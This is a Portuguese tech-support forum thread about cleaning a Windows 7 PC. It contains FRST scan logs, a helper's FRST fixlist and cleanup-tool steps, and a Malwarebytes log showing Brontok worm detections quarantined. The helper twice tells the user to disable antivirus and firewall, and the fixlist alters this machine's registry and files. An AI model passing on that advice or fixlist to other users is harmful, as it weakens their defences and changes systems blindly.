    R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [77440 2017-08-24] ()
    S3 H5xUSB; C:\Windows\System32\Drivers\uth5x64.sys [109568 2014-07-24] (UT)
    R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [28008 2014-04-11] (Intel Corporation)
    R4 IOMap; C:\Windows\system32\drivers\IOMap64.sys [23680 2013-01-25] (ASUSTeK Computer Inc.)
    R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [192960 2017-09-12] (Malwarebytes)
    R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [101824 2017-09-14] (Malwarebytes)
    R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [45472 2017-09-14] (Malwarebytes)
    R0 MBAMSwissArmy; C:\Windows\System32\drivers\MBAMSwissArmy.sys [253888 2017-09-14] (Malwarebytes)
    R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [84256 2017-09-14] (Malwarebytes)
    R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [129312 2014-09-30] (Intel Corporation)
    S3 MotioninJoyXFilter; C:\Windows\System32\DRIVERS\MijXfilt.sys [115272 2015-01-08] (MotioninJoy) [Arquivo não assinado]
    S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30328 2017-06-21] (NVIDIA Corporation)
    R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [48248 2017-06-21] (NVIDIA Corporation)
    R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57976 2017-05-03] (NVIDIA Corporation)
    R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-07-10] (Corel Corporation)
    R3 ScpVBus; C:\Windows\System32\DRIVERS\ScpVBus.sys [39168 2013-05-19] (Scarlet.Crush Productions)
    R3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [42760 2016-02-21] (Microsoft Corporation)
    R2 {B154377D-700F-42cc-9474-23858FBDF4BD}; C:\Program Files (x86)\CyberLink\PowerDVD9\000.fcl [146928 2009-02-28] (CyberLink Corp.)
    S3 catchme; \??\C:\ComboFix\catchme.sys [X]
    S3 X6va017; \??\C:\Windows\SysWOW64\Drivers\X6va017 [X]
    S3 X6va022; \??\C:\Windows\SysWOW64\Drivers\X6va022 [X]

    ==================== NetSvcs (Whitelisted) ===================

    (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)


    ==================== Um Mês Criados arquivos e pastas ========

    (Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

    2017-09-14 21:27 - 2017-09-14 21:27 - 000022657 _____ C:\Users\A\Desktop\FRST.txt
    2017-09-14 21:26 - 2017-09-14 21:27 - 000000000 ____D C:\FRST
    2017-09-14 21:26 - 2017-09-14 21:26 - 002398208 _____ (Farbar) C:\Users\A\Desktop\FRST64.exe
    2017-09-13 21:48 - 2017-09-13 21:48 - 000028272 _____ C:\Windows\system32\Drivers\TrueSight.sys
    2017-09-13 21:46 - 2017-09-13 22:02 - 000000000 ____D C:\Users\Todos os Usuários\RogueKiller
    2017-09-13 21:46 - 2017-09-13 22:02 - 000000000 ____D C:\ProgramData\RogueKiller
    2017-09-13 21:36 - 2017-09-13 21:38 - 000000000 ____D C:\AdwCleaner
    2017-09-13 20:09 - 2017-09-13 20:09 - 000136984 _____ C:\Users\A\AppData\Local\GDIPFONTCACHEV1.DAT
    2017-09-13 19:52 - 2017-09-13 19:52 - 005174872 _____ C:\Windows\system32\FNTCACHE.DAT
    2017-09-12 21:31 - 2017-09-12 21:31 - 000020249 _____ C:\Users\A\Desktop\mbam.txt
    2017-09-12 21:30 - 2017-09-14 20:39 - 000000000 ___HD C:\Users\Public\Documents\AdobeGC
    2017-09-12 21:01 - 2017-09-12 21:01 - 000192960 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
    2017-09-12 21:00 - 2017-09-14 20:31 - 000084256 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
    2017-09-12 21:00 - 2017-09-14 20:22 - 000253888 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
    2017-09-12 21:00 - 2017-09-14 20:22 - 000101824 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
    2017-09-12 21:00 - 2017-09-14 20:22 - 000045472 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
    2017-09-12 21:00 - 2017-09-12 21:00 - 000001830 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
    2017-09-12 21:00 - 2017-09-12 21:00 - 000000000 ____D C:\Users\Todos os Usuários\Malwarebytes
    2017-09-12 21:00 - 2017-09-12 21:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
    2017-09-12 21:00 - 2017-09-12 21:00 - 000000000 ____D C:\ProgramData\Malwarebytes
    2017-09-12 21:00 - 2017-09-12 21:00 - 000000000 ____D C:\Program Files\Malwarebytes
    2017-09-12 21:00 - 2017-08-24 11:27 - 000077440 _____ C:\Windows\system32\Drivers\mbae64.sys
    2017-09-11 22:04 - 2017-09-11 22:04 - 000000397 _____ C:\Users\A\Desktop\Cmd abrindo sozinho.txt
    2017-09-09 15:56 - 2017-09-09 15:56 - 000000000 ____D C:\Users\A\AppData\Local\MahoganyGame
    2017-09-09 15:34 - 2017-09-09 15:34 - 000000202 _____ C:\Users\A\Desktop\Project 1v1 Closed Technical Test.url
    2017-09-09 15:30 - 2017-09-09 16:59 - 000000000 ____D C:\Users\A\AppData\Local\UnrealEngine
    2017-08-31 01:46 - 2017-08-31 01:46 - 000000000 ____D C:\Users\A\AppData\Roaming\Bungie
    2017-08-31 01:16 - 2017-08-31 01:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Destiny 2
    2017-08-29 00:06 - 2017-08-29 00:06 - 000000000 ____D C:\Users\A\AppData\Local\id Software
    2017-08-24 01:24 - 2017-08-24 01:24 - 000000336 _____ C:\Users\A\advanced_ip_scanner_MAC.bin
    2017-08-24 01:24 - 2017-08-24 01:24 - 000000015 _____ C:\Users\A\advanced_ip_scanner_Comments.bin
    2017-08-24 01:24 - 2017-08-24 01:24 - 000000015 _____ C:\Users\A\advanced_ip_scanner_Aliases.bin
    2017-08-24 00:06 - 2017-08-24 00:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced IP Scanner v2
    2017-08-24 00:06 - 2017-08-24 00:06 - 000000000 ____D C:\Program Files (x86)\Advanced IP Scanner
    2017-08-24 00:03 - 2017-08-24 00:03 - 000000000 ____D C:\Users\A\Documents\Network Monitor 3

    ==================== Um Mês Modificados arquivos e pastas ========

    (Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

    2017-09-14 20:33 - 2017-04-27 20:23 - 000000000 ____D C:\Users\A\AppData\Local\Adobe
    2017-09-14 20:33 - 2014-07-04 07:43 - 000000000 ____D C:\Users\Todos os Usuários\NVIDIA
    2017-09-14 20:33 - 2014-07-04 07:43 - 000000000 ____D C:\ProgramData\NVIDIA
    2017-09-14 20:29 - 2009-07-14 01:45 - 000066112 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2017-09-14 20:29 - 2009-07-14 01:45 - 000066112 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2017-09-14 20:27 - 2011-04-12 10:40 - 000709454 _____ C:\Windows\system32\prfh0416.dat
    2017-09-14 20:27 - 2011-04-12 10:40 - 000148732 _____ C:\Windows\system32\prfc0416.dat
    2017-09-14 20:27 - 2009-07-14 02:13 - 001645972 _____ C:\Windows\system32\PerfStringBackup.INI
    2017-09-14 20:27 - 2009-07-14 00:20 - 000000000 ____D C:\Windows\inf
    2017-09-14 20:23 - 2014-07-17 17:59 - 000000000 ____D C:\Users\A\AppData\Local\Akamai
    2017-09-14 20:22 - 2009-07-14 02:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
    2017-09-13 22:02 - 2015-11-05 23:43 - 000000000 ____D C:\Program Files (x86)\Popcorn Time
    2017-09-12 21:45 - 2017-05-07 21:23 - 000000000 ____D C:\Users\A\AppData\Local\CrashDumps
    2017-09-11 21:39 - 2014-07-02 02:40 - 000000000 ____D C:\Users\A\AppData\Local\NVIDIA Corporation
    2017-09-03 21:57 - 2009-07-14 00:20 - 000000000 ____D C:\Windows\system32\NDF
    2017-08-31 22:54 - 2016-12-20 10:47 - 000000000 ____D C:\Users\A\AppData\Local\Battle.net
    2017-08-31 22:53 - 2016-12-20 10:42 - 000000000 ____D C:\Program Files (x86)\Battle.net
    2017-08-31 20:32 - 2017-04-27 21:02 - 000002453 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat DC.lnk
    2017-08-31 20:32 - 2017-04-27 21:02 - 000002040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat Distiller DC.lnk
    2017-08-30 20:58 - 2017-07-01 02:35 - 000000000 ____D C:\Program Files\Rockstar Games
    2017-08-30 20:58 - 2017-07-01 02:35 - 000000000 ____D C:\Program Files (x86)\Rockstar Games
    2017-08-28 20:57 - 2017-07-26 20:37 - 000000000 ____D C:\Users\A\Downloads\PopcornTime
    2017-08-28 20:03 - 2014-12-20 01:55 - 000002402 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2017-08-24 01:24 - 2014-07-04 07:44 - 000000000 ____D C:\Users\A

    ==================== Arquivos na raiz de alguns diretórios =======

    2015-03-19 19:43 - 2015-03-19 19:43 - 000000092 _____ () C:\Users\A\AppData\Roaming\settings.xml
    2014-12-02 21:13 - 2014-12-02 21:13 - 000017804 _____ () C:\Users\A\AppData\Roaming\unins001.dat
    2017-09-09 18:08 - 2017-09-09 18:08 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BIT56C.tmp
    2017-09-13 21:59 - 2017-09-13 21:59 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BIT8E5.tmp
    2017-08-03 22:48 - 2017-08-03 22:48 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITC58F.tmp
    2017-09-10 12:41 - 2017-09-10 12:41 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITC88E.tmp
    2017-07-24 21:20 - 2017-07-24 21:20 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITC960.tmp
    2017-08-27 10:05 - 2017-08-27 10:05 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITCCB9.tmp
    2017-08-13 21:54 - 2017-08-13 21:54 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITD286.tmp
    2017-06-11 22:17 - 2017-06-11 22:17 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITD2D8.tmp
    2017-08-20 10:14 - 2017-08-20 10:14 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITDCA8.tmp
    2017-07-16 09:18 - 2017-07-16 09:18 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITDD7A.tmp
    2017-08-06 11:46 - 2017-08-06 11:46 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITDF6D.tmp
    2017-09-08 23:52 - 2017-09-08 23:52 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE319.tmp
    2017-08-16 20:14 - 2017-08-16 20:14 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE73A.tmp
    2017-08-31 20:33 - 2017-08-31 20:33 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE7AD.tmp
    2017-08-04 20:39 - 2017-08-04 20:39 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE7E5.tmp
    2017-07-28 19:25 - 2017-07-28 19:25 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE7F8.tmp
    2017-08-06 19:46 - 2017-08-06 19:46 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE86B.tmp
    2017-08-19 09:16 - 2017-08-19 09:16 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE8C9.tmp
    2017-09-12 21:48 - 2017-09-12 21:48 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE926.tmp
    2017-09-09 12:42 - 2017-09-09 12:42 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE936.tmp
    2017-08-29 22:06 - 2017-08-29 22:06 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE94D.tmp
    2017-08-24 21:28 - 2017-08-24 21:28 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE95F.tmp
    2017-08-06 16:59 - 2017-08-06 16:59 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE964.tmp
    2017-08-17 20:38 - 2017-08-17 20:38 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE967.tmp
    2017-08-23 20:07 - 2017-08-23 20:07 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE98A.tmp
    2017-07-29 08:11 - 2017-07-29 08:11 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE9C2.tmp
    2017-09-03 18:14 - 2017-09-03 18:14 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE9D1.tmp
    2017-08-12 00:31 - 2017-08-12 00:31 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA0E.tmp
    2017-08-21 19:34 - 2017-08-21 19:34 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA49.tmp
    2017-09-02 22:26 - 2017-09-02 22:26 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA4F.tmp
    2017-08-25 19:29 - 2017-08-25 19:29 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA57.tmp
    2017-09-04 20:26 - 2017-09-04 20:26 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA69.tmp
    2017-07-27 19:41 - 2017-07-27 19:41 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA87.tmp
    2017-07-25 20:45 - 2017-07-25 20:45 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEAA3.tmp
    2017-07-16 15:10 - 2017-07-16 15:10 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEABE.tmp
    2017-08-23 23:12 - 2017-08-23 23:12 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB49.tmp
    2017-07-16 20:04 - 2017-07-16 20:04 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB59.tmp
    2017-09-01 19:55 - 2017-09-01 19:55 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB5E.tmp
    2017-08-28 20:07 - 2017-08-28 20:07 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB64.tmp
    2017-07-20 20:13 - 2017-07-20 20:13 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB73.tmp
    2017-08-15 16:31 - 2017-08-15 16:31 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB84.tmp
    2017-07-21 20:08 - 2017-07-21 20:08 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB8D.tmp
    2017-07-18 22:00 - 2017-07-18 22:00 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB91.tmp
    2017-07-16 19:28 - 2017-07-16 19:28 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEBC5.tmp
    2017-08-19 10:22 - 2017-08-19 10:22 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEBC6.tmp
    2017-08-26 08:40 - 2017-08-26 08:40 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEBC7.tmp
    2017-09-13 22:18 - 2017-09-13 22:18 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEC03.tmp
    2017-09-03 10:55 - 2017-09-03 10:55 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEC59.tmp
    2017-09-09 20:31 - 2017-09-09 20:31 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEC61.tmp
    2017-09-14 20:37 - 2017-09-14 20:37 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEC8B.tmp
    2017-09-12 20:35 - 2017-09-12 20:35 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITED28.tmp
    2017-09-07 13:27 - 2017-09-07 13:27 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITED5A.tmp
    2017-07-15 17:18 - 2017-07-15 17:18 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITED6A.tmp
    2017-08-18 23:37 - 2017-08-18 23:37 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITED82.tmp
    2017-09-06 21:50 - 2017-09-06 21:50 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEE1C.tmp
    2017-06-12 19:48 - 2017-06-12 19:48 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEE1F.tmp
    2017-07-26 20:20 - 2017-07-26 20:20 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEE6A.tmp
    2017-08-22 19:51 - 2017-08-22 19:51 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEEBC.tmp
    2017-09-05 20:33 - 2017-09-05 20:33 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEF36.tmp
    2017-09-11 21:43 - 2017-09-11 21:43 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEF68.tmp
    2017-08-30 20:56 - 2017-08-30 20:56 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEFA6.tmp
    2017-06-21 19:46 - 2017-06-21 19:46 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITF109.tmp
    2017-09-02 13:00 - 2017-09-02 13:00 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITF161.tmp
    2017-09-13 20:07 - 2017-09-13 20:07 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITF482.tmp
    2017-07-15 14:41 - 2017-07-15 14:41 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITF510.tmp
    2014-12-10 19:31 - 2014-12-10 19:31 - 000000017 _____ () C:\Users\A\AppData\Local\resmon.resmoncfg
    2016-06-02 06:54 - 2016-06-02 06:54 - 000000057 _____ () C:\ProgramData\Ament.ini

    Alguns arquivos em TEMP:
    ====================
    2017-09-13 21:46 - 2013-08-28 23:16 - 001732032 _____ (Microsoft Corporation) C:\Users\A\AppData\Local\Temp\dllnt_dump.dll

    ==================== Bamital & volsnap ======================

    (Não há correção automática para arquivos que não passaram na verificação.)

    C:\Windows\system32\winlogon.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\wininit.exe => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\wininit.exe => O arquivo é assinado digitalmente
    C:\Windows\explorer.exe => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\explorer.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\svchost.exe => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\svchost.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\services.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\User32.dll => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\User32.dll => O arquivo é assinado digitalmente
    C:\Windows\system32\userinit.exe => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\userinit.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\rpcss.dll => O arquivo é assinado digitalmente
    C:\Windows\system32\dnsapi.dll => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\dnsapi.dll => O arquivo é assinado digitalmente
    C:\Windows\system32\Drivers\volsnap.sys => O arquivo é assinado digitalmente

    LastRegBack: 2017-09-10 16:09

    ==================== Fim de FRST.txt ============================

    Addition.txt


    @Murilo Beraldo

     

Temporarily disable your antivirus, antispyware and firewall so they do not cause conflicts.

Open Notepad, then copy (Ctrl + C) and paste (Ctrl + V) all of the text in the CODE block below:

    CreateRestorePoint:
    CloseProcesses:
    HKLM-x32\...\Run: [] => [X]
    HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Run: [AdobeBridge] => [X]
    S2 PST Service; C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [X]
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Nenhum Arquivo
    ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  -> Nenhum Arquivo
    ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  -> Nenhum Arquivo
    ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  -> Nenhum Arquivo
    ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  -> Nenhum Arquivo
    ShellIconOverlayIdentifiers-x32: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  -> Nenhum Arquivo
    ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Nenhum Arquivo
    AlternateDataStreams: C:\Windows\zoek-delete.exe:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\MijFrc.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\nlasvc.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\ntoskrnl.exe:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\nvdispco6434709.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\nvdispgenco6434709.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\nvhdagenco64.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\profsvc.dll:$CmdTcID [130]
    AlternateDataStreams: C:\Windows\system32\rstrui.exe:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\srclient.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\srcore.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\TSWbPrxy.exe:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\SysWOW64\ncsi.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\SysWOW64\nlaapi.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\SysWOW64\ntkrnlpa.exe:$CmdTcID [130]
    AlternateDataStreams: C:\Windows\SysWOW64\ntoskrnl.exe:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\SysWOW64\srclient.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\Drivers\MijXfilt.sys:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\Drivers\mrxdav.sys:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\Drivers\xusb21.sys:$CmdTcID [64]
    AlternateDataStreams: C:\Program Files\Common Files\Microsoft Shared:UPcfOAsE1KunjptYH0m02qzp [1740]
    AlternateDataStreams: C:\Users\A\Cookies:pWHKllbk8iXaipFAB5TDsQ [1962]
    AlternateDataStreams: C:\Users\A\AppData\Local\377wbLvawwhm:fJxd617Wb8DI0RTPPTB43qFAk7fQV [2124]
    AlternateDataStreams: C:\Users\A\AppData\Local\Temp:$DATA [16]
    AlternateDataStreams: C:\Users\A\AppData\Local\Temp:ssFkwJuAbIKTYKDrHimGW2j [1828]
    AlternateDataStreams: C:\Users\A\Documents\Produção 1.dmsm:Roxio EMC Stream [38]
    AlternateDataStreams: C:\ProgramData\Microsoft:LNDHNwLQFpmHyXMHzErh2FQP [1934]
    AlternateDataStreams: C:\ProgramData\Microsoft:rG8Gh5XOmwb4Mi5XrZ [1998]
    AlternateDataStreams: C:\Users\Todos os Usuários\Microsoft:LNDHNwLQFpmHyXMHzErh2FQP [1934]
    AlternateDataStreams: C:\Users\Todos os Usuários\Microsoft:rG8Gh5XOmwb4Mi5XrZ [1998]
    VirusTotal: C:\ComboFix\catchme.sys
    VirusTotal: C:\Windows\SysWOW64\Drivers\X6va017
    VirusTotal: C:\Windows\SysWOW64\Drivers\X6va022
    CMD: ipconfig /flushdns
    RemoveProxy:
    EmptyTemp:
    CreateRestorePoint:

Save this file on your desktop with the name fixlist

NOTE: It is extremely important that the "fixlist" file be saved on your Desktop. Also check that FRST.exe is on the Desktop.

Click the Fix button.

Wait; when it finishes, the log Fixlog.txt will be saved on your desktop.

Attach the log to your next reply.


    @Murilo Beraldo

     

Follow the steps below:

STEP 1

Download Malwarebytes Anti-Malware (MBAM) from the link below and save it to your desktop.
https://downloads.malwarebytes.org/file/mbam_current/

Double-click mbam-setup.exe and follow the prompts to install the program.

• On the Scan tab > Custom Scan, check the option Scan for rootkits and the entries for the drive where the operating system is installed (normally drive C:);
• Click Scan Now. Be patient, as the scan may take a while;
• When the scan finishes, if any items were found, make sure they are all checked and click the Remove Selected or Quarantine button;
• At the end of the disinfection, a prompt may appear asking whether you want to restart the PC (see the Note below);
• If MBAM does not run automatically after the restart, run it manually;
• The log is saved automatically by MBAM; to view it, click the Reports tab in the program's main window;
• Double-click the log (Scan report). Click the Export button and use the .txt format to export the log. Save it to the Desktop;
• Open the file, select all, copy and paste the contents of this log into your next reply.

NOTE: If MBAM finds files it cannot remove, it may need to restart the PC (possibly more than once). Do so immediately when asked whether you want to restart the PC.

STEP 2

Download AdwCleaner from one of the links below and save it to your desktop.
    https://toolslib.net/downloads/viewdownload/1-adwcleaner/
    http://www.bleepingcomputer.com/download/adwcleaner/

Click DOWNLOAD NOW to download the file.

Run adwcleaner.exe

NOTE: Users of Windows Vista, 7, 8/8.1 and Windows 10: right-click the AdwCleaner.exe file, then click the menu option shown in the attached image (VRIfczU.png).

Click SCAN. When it finishes, click CLEAN and wait.

Notepad will open with the results.

Select, copy and paste its contents into your next reply.

STEP 3

Temporarily disable your antivirus, antispyware and firewall so they do not cause conflicts.

Download jrt.exe from the link below and save it to your desktop.
    http://www.bleepingcomputer.com/download/junkware-removal-tool/

Double-click to run the Junkware Removal Tool (JRT).

NOTE: Users of Windows Vista, 7, 8/8.1 and Windows 10: right-click the jrt.exe file, then click the menu option shown in the attached image (VRIfczU.png).

The tool will begin scanning your system. Be patient, as it may take a while depending on the number of items to be scanned.

At the end, a log will open. It is saved on the desktop with the name JRT.txt.

Select, copy and paste the contents of this log into your next reply.

  • Topic author
  • Hello! The logs are below

     

Just for the record... these detections that MBAM made have already appeared more than once (in the same quantity, too).

Thanks!

     

MBAM Log

     

    Malwarebytes
    www.malwarebytes.com

    -Detalhes de registro-
    Data da análise: 17/09/17
    Hora da análise: 22:35
    Arquivo de registro: b31d2dac-9c11-11e7-aec0-40167eab023a.json
    Administrador: Sim

    -Informação do software-
    Versão: 3.2.2.2029
    Versão de componentes: 1.0.188
    Versão do pacote de definições: 1.0.2826
    Licença: Versão de Avaliação

    -Informação do sistema-
    Sistema operacional: Windows 7 Service Pack 1
    CPU: x64
    Sistema de arquivos: NTFS
    Usuário: LUCAS-PC\A

    -Resumo da análise-
    Tipo de análise: Análise Customizada
    Resultado: Concluído
    Objetos verificados: 463194
    Ameaças detectadas: 147
    Ameaças em quarentena: 147
    Tempo decorrido: 24 min, 28 seg

    -Opções da análise-
    Memória: Habilitado
    Inicialização: Habilitado
    Sistema de arquivos: Habilitado
    Arquivos compactados: Habilitado
    Rootkits: Habilitado
    Heurística: Habilitado
    PUP: Detectar
    PUM: Detectar

    -Detalhes da análise-
    Processo: 0
    (Nenhum item malicioso detectado)

    Módulo: 0
    (Nenhum item malicioso detectado)

    Chave de registro: 1
    PUP.Optional.PopDeals, HKLM\SOFTWARE\PopDeals, Quarentena, [2622], [241849],1.0.2826

    Valor de registro: 0
    (Nenhum item malicioso detectado)

    Dados de registro: 0
    (Nenhum item malicioso detectado)

    Fluxo de dados: 0
    (Nenhum item malicioso detectado)

    Pasta: 1
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok, Quarentena, [2750], [370221],1.0.2826

    Arquivo: 145
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\a@a.au.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\a@a.com.au.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\a@a.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\a@b.c.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\a@b.cc.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\aa@bb.org.ini, Quarentena, [2750], [370221],1.0.2826
